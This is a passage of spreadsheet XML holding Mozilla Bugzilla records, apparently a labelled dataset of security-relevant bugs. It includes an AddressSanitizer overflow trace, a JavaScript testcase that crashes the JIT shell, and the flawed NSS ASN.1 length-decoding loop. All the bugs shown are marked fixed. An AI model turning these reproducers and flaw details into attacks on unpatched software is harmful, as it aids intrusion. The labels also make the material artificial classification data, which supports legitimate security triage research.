      </c>
      <c r="R5236" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5236" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T5236" t="n">
        <v>1</v>
      </c>
      <c r="U5236" t="n">
        <v>0</v>
      </c>
      <c r="V5236" t="n">
        <v>27</v>
      </c>
      <c r="W5236" t="inlineStr">
        <is>
          <t>Created attachment 614112
firefox-crash.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
Steps to reproduce:
I ran the attached testcase on ASANified Firefox Beta 12.0 and Firefox Aurora 13.0a2 and got this crash. The testcase reproduces reliably on slower bots.
=================================================================
==22842== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f3963484b86 at pc 0x7f397f1c4155 bp 0x7fff6ca8a7a0 sp 0x7fff6ca8a798
READ of size 2 at 0x7f3963484b86 thread T0
    #0 0x7f397f1c4155 in utf16_to_isolatin1 firefox/beta-src/xpcom/io/nsNativeCharsetUtils.cpp:123
    #1 0x7f397f1c470e in NS_CopyUnicodeToNative(nsAString_internal const&amp;, nsACString_internal&amp;) firefox/beta-src/xpcom/io/nsNativeCharsetUtils.cpp:865
    #2 0x7f397f1e2acf in nsLocalFile::InitWithPath(nsAString_internal const&amp;) firefox/beta-src/xpcom/io/nsLocalFileUnix.cpp:1968
    #3 0x7f397d3c6345 in net_GetFileFromURLSpec(nsACString_internal const&amp;, nsIFile**) firefox/beta-src/netwerk/base/src/nsURLHelperUnix.cpp:121
    #4 0x7f397d39dfed in nsStandardURL::EnsureFile() firefox/beta-src/netwerk/base/src/nsStandardURL.cpp:2546
    #5 0x7f397d39e06f in nsStandardURL::GetFile(nsIFile**) firefox/beta-src/netwerk/base/src/nsStandardURL.cpp:2553
    #6 0x7f397d463c2f in nsFileChannel::OpenContentStream(bool, nsIInputStream**, nsIChannel**) firefox/beta-src/netwerk/protocol/file/nsFileChannel.cpp:315
    #7 0x7f397d349de0 in nsBaseChannel::BeginPumpingData() firefox/beta-src/netwerk/base/src/nsBaseChannel.cpp:240
    #8 0x7f397d34bd59 in nsBaseChannel::AsyncOpen(nsIStreamListener*, nsISupports*) firefox/beta-src/netwerk/base/src/nsBaseChannel.cpp:609
    #9 0x7f397dcf38e9 in nsScriptLoader::StartLoad(nsScriptLoadRequest*, nsAString_internal const&amp;) firefox/beta-src/content/base/src/nsScriptLoader.cpp:339
    #10 0x7f397dcf9bb9 in nsScriptLoader::PreloadURI(nsIURI*, nsAString_internal const&amp;, nsAString_internal const&amp;) firefox/beta-src/content/base/src/nsScriptLoader.cpp:1340
    #11 0x7f397e3a02a2 in nsHtml5TreeOpExecutor::PreloadScript(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;) firefox/beta-src/parser/html/nsHtml5TreeOpExecutor.cpp:940
    #12 0x7f397e3aa949 in nsHtml5SpeculativeLoad::Perform(nsHtml5TreeOpExecutor*) firefox/beta-src/parser/html/nsHtml5SpeculativeLoad.cpp:67
    #13 0x7f397e39ea54 in nsHtml5TreeOpExecutor::RunFlushLoop() firefox/beta-src/parser/html/nsHtml5TreeOpExecutor.cpp:478
    #14 0x7f397e3aa2f2 in nsHtml5ExecutorFlusher::Run() firefox/beta-src/parser/html/nsHtml5StreamParser.cpp:160
    #15 0x7f397f165d7d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/beta-src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:245
    #16 0x7f397efe5b25 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/beta-src/ipc/glue/MessagePump.cpp:110
    #17 0x7f397f26bccf in MessageLoop::Run() firefox/beta-src/ipc/chromium/src/base/message_loop.cc:176
    #18 0x7f397edf3acc in nsBaseAppShell::Run() firefox/beta-src/widget/xpwidgets/nsBaseAppShell.cpp:191
    #19 0x407982 in do_main firefox/beta-src/browser/app/nsBrowserApp.cpp:205
    #20 0x40707a in main firefox/beta-src/browser/app/nsBrowserApp.cpp:295
    #21 0x7f3984550c4d in __libc_start_main /build/buildd/eglibc-2.11.1/csu/libc-start.c:258
0x7f3963484b86 is located 0 bytes to the right of 262-byte region [0x7f3963484a80,0x7f3963484b86)
allocated by thread T0 here:
    #0 0x4103e2 in malloc 
    #1 0x7f397f234a9d in nsStringBuffer::Alloc(unsigned long) firefox/beta-src/xpcom/string/src/nsSubstring.cpp:209
    #2 0x7f397f237467 in nsAString_internal::SetCapacity(unsigned int) firefox/beta-src/xpcom/string/src/nsTSubstring.cpp:549
    #3 0x7f397f235b9d in nsAString_internal::SetLength(unsigned int) firefox/beta-src/xpcom/string/src/nsTSubstring.cpp:579
==22842== ABORTING
Stats: 98M malloced (100M for red zones) by 213591 calls
Stats: 5M realloced by 10131 calls
Stats: 68M freed by 115413 calls
Stats: 0M really freed by 0 calls
Stats: 220M (56351 full pages) mmaped in 55 calls
  mmaps   by size class: 8:180213; 9:32764; 10:12285; 11:12282; 12:2048; 13:1536; 14:1280; 15:256; 16:512; 17:128; 18:64; 19:8; 20:4; 21:2;
  mallocs by size class: 8:159655; 9:26841; 10:10317; 11:11443; 12:1809; 13:1402; 14:1249; 15:204; 16:479; 17:123; 18:57; 19:6; 20:4; 21:2;
  frees   by size class: 8:75941; 9:18459; 10:7803; 11:9347; 12:1445; 13:636; 14:1116; 15:170; 16:364; 17:115; 18:11; 19:4; 20:2;
  rfrees  by size class:
Stats: malloc large: 192 small slow: 1306
Shadow byte and word:
  0x1fe72c690970: 6
  0x1fe72c690970: 06 fb fb fb fb fb fb fb
More shadow bytes:
  0x1fe72c690950: 00 00 00 00 00 00 00 00
  0x1fe72c690958: 00 00 00 00 00 00 00 00
  0x1fe72c690960: 00 00 00 00 00 00 00 00
  0x1fe72c690968: 00 00 00 00 00 00 00 00
=&gt;0x1fe72c690970: 06 fb fb fb fb fb fb fb
  0x1fe72c690978: fb fb fb fb fb fb fb fb
  0x1fe72c690980: fa fa fa fa fa fa fa fa
  0x1fe72c690988: fa fa fa fa fa fa fa fa
  0x1fe72c690990: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X5236" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5237">
      <c r="A5237" t="n">
        <v>1352481</v>
      </c>
      <c r="B5237" t="inlineStr">
        <is>
          <t>2017-03-31 10:06:33 -0700</t>
        </is>
      </c>
      <c r="C5237" t="inlineStr">
        <is>
          <t>Search should find matched strings within popups and subdialogs</t>
        </is>
      </c>
      <c r="D5237" t="inlineStr">
        <is>
          <t>2017-08-08 02:04:21 -0700</t>
        </is>
      </c>
      <c r="E5237" t="n">
        <v>1</v>
      </c>
      <c r="F5237" t="n">
        <v>1</v>
      </c>
      <c r="G5237" t="n">
        <v>2</v>
      </c>
      <c r="H5237" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5237" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5237" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K5237" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5237" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5237" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5237" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5237" t="inlineStr">
        <is>
          <t xml:space="preserve"> [photon-preference] </t>
        </is>
      </c>
      <c r="Q5237" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5237" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T5237" t="n">
        <v>1</v>
      </c>
      <c r="U5237" t="n">
        <v>0</v>
      </c>
      <c r="V5237" t="n">
        <v>57</v>
      </c>
      <c r="W5237" t="inlineStr">
        <is>
          <t>The search being implemented by bug 1335905 filters elements within the preferences pages but doesn't reach in to subdialogs and various popups to find any matching text there.
We should look for string matches within popups, and if we find any we should show a tooltip (bug 1351867) next to the button showing that the text would be revealed by clicking on the button.
We may need to either build a string index or have some way to find the strings within a dialog instead of opening each dialog as that will have really bad performance.</t>
        </is>
      </c>
      <c r="X5237" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5238">
      <c r="A5238" t="n">
        <v>480027</v>
      </c>
      <c r="B5238" t="inlineStr">
        <is>
          <t>2009-02-24 13:30:37 -0800</t>
        </is>
      </c>
      <c r="C5238" t="inlineStr">
        <is>
          <t>distribute personas via AMO</t>
        </is>
      </c>
      <c r="D5238" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E5238" t="n">
        <v>1</v>
      </c>
      <c r="F5238" t="n">
        <v>1</v>
      </c>
      <c r="G5238" t="n">
        <v>6</v>
      </c>
      <c r="H5238" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5238" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J5238" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K5238" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5238" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5238" t="inlineStr"/>
      <c r="Q5238" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5238" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5238" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5238" t="n">
        <v>1</v>
      </c>
      <c r="U5238" t="n">
        <v>0</v>
      </c>
      <c r="V5238" t="n">
        <v>8</v>
      </c>
      <c r="W5238" t="inlineStr">
        <is>
          <t>We should start distributing Personas via AMO rather than people.mozilla.com, updating users of the people.mozilla.com-distributed version to the AMO-distributed version in the process so they get future updates to the extension.</t>
        </is>
      </c>
      <c r="X5238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5239">
      <c r="A5239" t="n">
        <v>569384</v>
      </c>
      <c r="B5239" t="inlineStr">
        <is>
          <t>2010-06-01 10:27:30 -0700</t>
        </is>
      </c>
      <c r="C5239" t="inlineStr">
        <is>
          <t>TM: Crash [@ JSObject::dropProperty] or [@ js::TraceRecorder::record_JSOP_IN] or "Assertion failure: status == ARECORD_ERROR,"</t>
        </is>
      </c>
      <c r="D5239" t="inlineStr">
        <is>
          <t>2015-10-16 11:47:50 -0700</t>
        </is>
      </c>
      <c r="E5239" t="n">
        <v>1</v>
      </c>
      <c r="F5239" t="n">
        <v>1</v>
      </c>
      <c r="G5239" t="n">
        <v>3</v>
      </c>
      <c r="H5239" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5239" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5239" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5239" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5239" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5239" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5239" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5239" t="inlineStr">
        <is>
          <t>[ccbr][sg:critical], fixed-in-tracemonkey [critsmash:patch] [qa-ntd-192]</t>
        </is>
      </c>
      <c r="Q5239" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5239" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5239" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5239" t="n">
        <v>1</v>
      </c>
      <c r="U5239" t="n">
        <v>0</v>
      </c>
      <c r="V5239" t="n">
        <v>16</v>
      </c>
      <c r="W5239" t="inlineStr">
        <is>
          <t>for (b = 0; b &lt; 1; ++b) {
    var d = b
}
(function () {
    x = Proxy.create(function () {
        return {
            getPropertyDescriptor: function () {
                +""
            }
        }
    }(), 5)
}())
for (a = 0; a &lt; 3; ++a) {
    if (a == 1) {
        d in x
    }
}
crashes js opt shell with -j on TM tip at JSObject::dropProperty and asserts js debug shell with -j on TM tip at Assertion failure: status == ARECORD_ERROR, at ../jsops.cpp:7
s-s because this seems like a scary address (prior to reduction the edx instruction was at a weird 0x128 location). Assuming [sg:critical?] unless otherwise noted.
Program received signal SIGSEGV, Segmentation fault.
0x080bfef7 in JSObject::dropProperty(JSContext*, JSProperty*) ()
(gdb) bt
#0  0x080bfef7 in JSObject::dropProperty(JSContext*, JSProperty*) ()
#1  0x08216644 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb) x/i $eip
=&gt; 0x80bfef7 &lt;_ZN8JSObject12dropPropertyEP9JSContextP10JSProperty+7&gt;:	mov    (%edx),%eax
(gdb) x/b $edx
0x1:	Cannot access memory at address 0x1</t>
        </is>
      </c>
      <c r="X5239" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5240">
      <c r="A5240" t="n">
        <v>1064670</v>
      </c>
      <c r="B5240" t="inlineStr">
        <is>
          <t>2014-09-08 20:25:30 -0700</t>
        </is>
      </c>
      <c r="C5240" t="inlineStr">
        <is>
          <t>ASN.1 DER decoding of lengths is too permissive, allowing undetected smuggling of arbitrary data</t>
        </is>
      </c>
      <c r="D5240" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:03 -0700</t>
        </is>
      </c>
      <c r="E5240" t="n">
        <v>1</v>
      </c>
      <c r="F5240" t="n">
        <v>1</v>
      </c>
      <c r="G5240" t="n">
        <v>3</v>
      </c>
      <c r="H5240" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5240" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5240" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5240" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5240" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5240" t="inlineStr">
        <is>
          <t>[adv-main36-] sec-low/moderate after fix in bug 1064636, we don't know of any other exploitable paths</t>
        </is>
      </c>
      <c r="Q5240" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5240" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5240" t="inlineStr">
        <is>
          <t>3.17.3</t>
        </is>
      </c>
      <c r="T5240" t="n">
        <v>1</v>
      </c>
      <c r="U5240" t="n">
        <v>0</v>
      </c>
      <c r="V5240" t="n">
        <v>59</v>
      </c>
      <c r="W5240" t="inlineStr">
        <is>
          <t>Created attachment 8486180
Test demonstrating the problem (GTest)
+++ This bug was initially created as a clone of Bug #1064636 +++
In some contexts, such as when decoding the AlgorithmIdentifier within a PKCS#1 signature, it is critical that we minimize the variance of possible encodings that are accepted when we parse a DER-encoded data stream. Usually "minimize the variance" means "only accept the legal DER encoding of the data, and reject any overly-long encodings or any other variant." In some contexts, failing to restrict variance in accepted encodings completely undoes the cryptography. See bug 1064636, bug 351079, and bug 350640, for example.
See the attached test, where I demonstrate that SEC_QuickDERDecodeItem (a.k.a. QuickDER) accepts many malformed encodings of ASN.1 lengths. Note, in particular the test case where the length of the NULL item is encoded as { 0x90, &lt;arbitrary junk&gt;, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, which is wrongly interpreted by QuickDER as equivalent to { 0x00 } on both 32-bit and 64-bit platforms. I believe it is likely that this would facilitate the same types of attacks as described in the aforementioned bugs.
In quickder.c, the function definite_length_decoder is used to decode tags and lengths. It decodes the length as follows:
    unsigned int data_len;
    // [...]
    data_len = buf[used_length++];
    if (data_len&amp;0x80)
    {
        int  len_count = data_len &amp; 0x7f;
        data_len = 0;
        while (len_count-- &gt; 0)
        {
            if (used_length &gt;= length)
            {
                return NULL;
            }
            data_len = (data_len &lt;&lt; 8) | buf[used_length++];
        }
    }
Note that there is no check that the encoding of the length is the shortest necssary encoding. And also note the integer overflow of data_len.
In the case of PKCS#1 (i.e. the aforementioned bugs), we shouldn't even be doing DER decoding in the first place. However, it isn't obvious to me yet what contexts besides PKCS#1 are also problematic, so it prudent to fix QuickDER, regardless of the fix for the PKCS#1 decoder in bug 1064636.
The attached GTest integrates into Gecko's mozilla::pkix test suite, for my own convenience. However, it doesn't use any of the mozilla::pkix or Gecko GTest utilities, so it should be easy to integrate it into other GTest-based test suites.</t>
        </is>
      </c>
      <c r="X5240" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5241">
      <c r="A5241" t="n">
        <v>468563</v>
      </c>
      <c r="B5241" t="inlineStr">
        <is>
          <t>2008-12-08 20:22:22 -0800</t>
        </is>
      </c>
      <c r="C5241" t="inlineStr">
        <is>
          <t>Another crash [@ GetChildListNameFor] with -moz-column, position:absolute</t>
        </is>
      </c>
      <c r="D5241" t="inlineStr">
        <is>
          <t>2011-06-20 18:07:46 -0700</t>
        </is>
      </c>
      <c r="E5241" t="n">
        <v>1</v>
      </c>
      <c r="F5241" t="n">
        <v>1</v>
      </c>
      <c r="G5241" t="n">
        <v>3</v>
      </c>
      <c r="H5241" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5241" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5241" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5241" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5241" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5241" t="inlineStr">
        <is>
          <t>[sg:critical? on 1.9.1][sg:dos frame-poisoned crash on 1.9.2]</t>
        </is>
      </c>
      <c r="Q5241" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5241" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5241" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5241" t="n">
        <v>1</v>
      </c>
      <c r="U5241" t="n">
        <v>0</v>
      </c>
      <c r="V5241" t="n">
        <v>51</v>
      </c>
      <c r="W5241" t="inlineStr">
        <is>
          <t>Created attachment 352043
testcase (crashes Firefox when loaded)
###!!! ASSERTION: out-of-flow is already in the destroy queue: 'aDestroyQueue.IndexOf(outOfFlowFrame) == kNotFound', file /Users/jruderman/central/layout/base/nsCSSFrameConstructor.cpp, line 9240
Crash [@ GetChildListNameFor] dereferencing 0xdddddddd, like in bug 411835.</t>
        </is>
      </c>
      <c r="X5241" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5242">
      <c r="A5242" t="n">
        <v>465347</v>
      </c>
      <c r="B5242" t="inlineStr">
        <is>
          <t>2008-11-17 08:17:47 -0800</t>
        </is>
      </c>
      <c r="C5242" t="inlineStr">
        <is>
          <t>Patch for bug 465241 introduces buggy js_Int32ToId</t>
        </is>
      </c>
      <c r="D5242" t="inlineStr">
        <is>
          <t>2009-01-16 00:03:56 -0800</t>
        </is>
      </c>
      <c r="E5242" t="n">
        <v>1</v>
      </c>
      <c r="F5242" t="n">
        <v>1</v>
      </c>
      <c r="G5242" t="n">
        <v>3</v>
      </c>
      <c r="H5242" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5242" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5242" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5242" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5242" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5242" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5242" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5242" t="inlineStr"/>
      <c r="Q5242" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5242" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5242" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T5242" t="n">
        <v>1</v>
      </c>
      <c r="U5242" t="n">
        <v>0</v>
      </c>
      <c r="V5242" t="n">
        <v>11</v>
      </c>
      <c r="W5242" t="inlineStr">
        <is>
          <t>See bug 465241 comment 6. a[-1] is not the same as a[0xffffffff] for an array or any JS object.
/be</t>
        </is>
      </c>
      <c r="X5242" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5243">
      <c r="A5243" t="n">
        <v>1811327</v>
      </c>
      <c r="B5243" t="inlineStr">
        <is>
          <t>2023-01-19 11:00:22 -0800</t>
        </is>
      </c>
      <c r="C5243" t="inlineStr">
        <is>
          <t>cfi-derived-cast: Invalid downcast in ExecutionRunnable::RunOnWorkletThread</t>
        </is>
      </c>
      <c r="D5243" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:08 -0700</t>
        </is>
      </c>
      <c r="E5243" t="n">
        <v>1</v>
      </c>
      <c r="F5243" t="n">
        <v>1</v>
      </c>
      <c r="G5243" t="n">
        <v>3</v>
      </c>
      <c r="H5243" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5243" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5243" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5243" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5243" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5243" t="inlineStr">
        <is>
          <t>[adv-main111+][adv-esr102.9+]</t>
        </is>
      </c>
      <c r="Q5243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5243" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T5243" t="n">
        <v>1</v>
      </c>
      <c r="U5243" t="n">
        <v>0</v>
      </c>
      <c r="V5243" t="n">
        <v>18</v>
      </c>
      <c r="W5243" t="inlineStr">
        <is>
          <t>Steps to reproduce:
When compiling Firefox with cfi-derived-cast, crashtest dom/media/test/crashtests/audioworkletnode-after-unload-1.html fails due to the downcasting here:
https://searchfox.org/mozilla-central/rev/daf613efc5c358f3a94961d73b90472c00703838/dom/worklet/Worklet.cpp#410
The dynamic type of the casted object is `nsThread`, a parent class of `WorkletThread`.
This might not be s-s, just flagging as a precaution.</t>
        </is>
      </c>
      <c r="X5243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5244">
      <c r="A5244" t="n">
        <v>1582857</v>
      </c>
      <c r="B5244" t="inlineStr">
        <is>
          <t>2019-09-20 14:39:49 -0700</t>
        </is>
      </c>
      <c r="C5244" t="inlineStr">
        <is>
          <t>DOM methods called with cross-origin this object don't handle document.domain consideration correctly</t>
        </is>
      </c>
      <c r="D5244" t="inlineStr">
        <is>
          <t>2022-01-10 05:34:53 -0800</t>
        </is>
      </c>
      <c r="E5244" t="n">
        <v>1</v>
      </c>
      <c r="F5244" t="n">
        <v>1</v>
      </c>
      <c r="G5244" t="n">
        <v>3</v>
      </c>
      <c r="H5244" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5244" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5244" t="inlineStr">
        <is>
          <t>DOM: Bindings (WebIDL)</t>
        </is>
      </c>
      <c r="K5244" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5244" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5244" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5244" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5244" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main70+][adv-esr68.2+]</t>
        </is>
      </c>
      <c r="Q5244" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5244" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5244" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T5244" t="n">
        <v>1</v>
      </c>
      <c r="U5244" t="n">
        <v>0</v>
      </c>
      <c r="V5244" t="n">
        <v>15</v>
      </c>
      <c r="W5244" t="inlineStr">
        <is>
          <t>We should be using the same security checks when we try to read a property on a cross-origin object, e.g., `crossOriginWindow.open` and when we try to call a same-origin native function with a cross-origin `this` object, e.g., `window.open.call(crossOriginWindow)`. For the most part, they do behave the same, but when the objects are same-site with a document.domain difference, the latter succeeds, while the former throws a security exception.</t>
        </is>
      </c>
      <c r="X5244" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5245">
      <c r="A5245" t="n">
        <v>972622</v>
      </c>
      <c r="B5245" t="inlineStr">
        <is>
          <t>2014-02-13 15:24:47 -0800</t>
        </is>
      </c>
      <c r="C5245" t="inlineStr">
        <is>
          <t>WebGL.compressedTex(Sub)Image2D doesn't call MakeCurrent</t>
        </is>
      </c>
      <c r="D5245" t="inlineStr">
        <is>
          <t>2014-04-25 12:08:50 -0700</t>
        </is>
      </c>
      <c r="E5245" t="n">
        <v>1</v>
      </c>
      <c r="F5245" t="n">
        <v>1</v>
      </c>
      <c r="G5245" t="n">
        <v>3</v>
      </c>
      <c r="H5245" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5245" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5245" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5245" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5245" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5245" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5245" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5245" t="inlineStr">
        <is>
          <t>[qa-][adv-main28+]</t>
        </is>
      </c>
      <c r="Q5245" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5245" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5245" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T5245" t="n">
        <v>1</v>
      </c>
      <c r="U5245" t="n">
        <v>0</v>
      </c>
      <c r="V5245" t="n">
        <v>15</v>
      </c>
      <c r="W5245" t="inlineStr">
        <is>
          <t>Ok, this one is potentially dangerous, since it can change the data in another context. It can't steal data, only upload its own data, though.
Maybe a very low likelihood sec-vector?</t>
        </is>
      </c>
      <c r="X5245" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5246">
      <c r="A5246" t="n">
        <v>1229855</v>
      </c>
      <c r="B5246" t="inlineStr">
        <is>
          <t>2015-12-02 10:02:10 -0800</t>
        </is>
      </c>
      <c r="C5246" t="inlineStr">
        <is>
          <t>Crash [@ js::wasm::ToMIRType] or Crash on Heap</t>
        </is>
      </c>
      <c r="D5246" t="inlineStr">
        <is>
          <t>2017-05-19 15:40:12 -0700</t>
        </is>
      </c>
      <c r="E5246" t="n">
        <v>1</v>
      </c>
      <c r="F5246" t="n">
        <v>1</v>
      </c>
      <c r="G5246" t="n">
        <v>3</v>
      </c>
      <c r="H5246" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5246" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5246" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
